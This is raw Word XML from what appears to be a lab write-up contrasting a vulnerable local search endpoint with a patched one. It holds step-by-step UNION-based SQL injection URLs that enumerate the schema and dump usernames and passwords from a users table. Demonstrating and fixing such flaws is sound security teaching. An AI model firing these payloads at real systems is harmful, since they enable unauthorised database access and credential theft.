          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A11E428" wp14:editId="2B6AB118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8EB3" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002"/>
    <w:p w14:paraId="64E02F02" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r>
        <w:t>3.User:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07785298" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>localhost:3000/search-user?name=test%27 UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name=%27users%27-- -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2E055627" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r w:rsidRPr="00234D75">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3718A209" wp14:editId="470D1593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F435" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r>
        <w:t>4.actual data dump:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74934727" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>localhost:3000/search-user?name=test%27 UNION SELECT username,password,NULL FROM users-- -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="511DA252" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:r w:rsidRPr="00234D75">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C018E3A" wp14:editId="42BA4181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0711" w14:textId="1B5B79E5" w:rsidR="00100002" w:rsidRPr="00A94C9E" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A94C9E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>SAFE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC10ADE" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002" w:rsidP="00100002">
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>localhost:3001/search-user?name=test%27 UNION SELECT username,password,NULL FROM users-- -</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="61461942" w14:textId="2E7EE153" w:rsidR="00100002" w:rsidRPr="002E6886" w:rsidRDefault="00100002" w:rsidP="002E6886">
      <w:r w:rsidRPr="00234D75">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E6FC40E" wp14:editId="20C15742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16D9" w14:textId="77777777" w:rsidR="00100002" w:rsidRDefault="00100002"/>
    <w:sectPr w:rsidR="00100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02"/>
    <w:rsid w:val="00100002"/>
    <w:rsid w:val="00240AD0"/>
    <w:rsid w:val="002E6886"/>
    <w:rsid w:val="00682E32"/>
    <w:rsid w:val="00782CA9"/>
    <w:rsid w:val="008B3FF0"/>
    <w:rsid w:val="00A9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163A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1D321DE6-F7B1-4AA7-93A3-3929F01F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0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://localhost:3000/search-user?name=test%27%20UNION%20SELECT%20username,password,NULL%20FROM%20users--%20-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://localhost:3000/search-user?name=test%27%20UNION%20SELECT%20NULL,NULL,NULL--%20-" TargetMode="External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://localhost:3000/search-user?name=test%27%20UNION%20SELECT%20column_name,NULL,NULL%20FROM%20information_schema.columns%20WHERE%20table_name=%27users%27--%20-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hyperlink" Target="http://localhost:3001/search-user?name=test%27%20UNION%20SELECT%20username,password,NULL%20FROM%20users--%20-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localhost:3000/search-user?name=test%27%20UNION%20SELECT%20table_schema,table_name,NULL%20FROM%20information_schema.tables--%20-" TargetMode="External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2026-10-11T10:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-11T10:35:00Z</dcterms:modified>
</cp:coreProperties>
</file>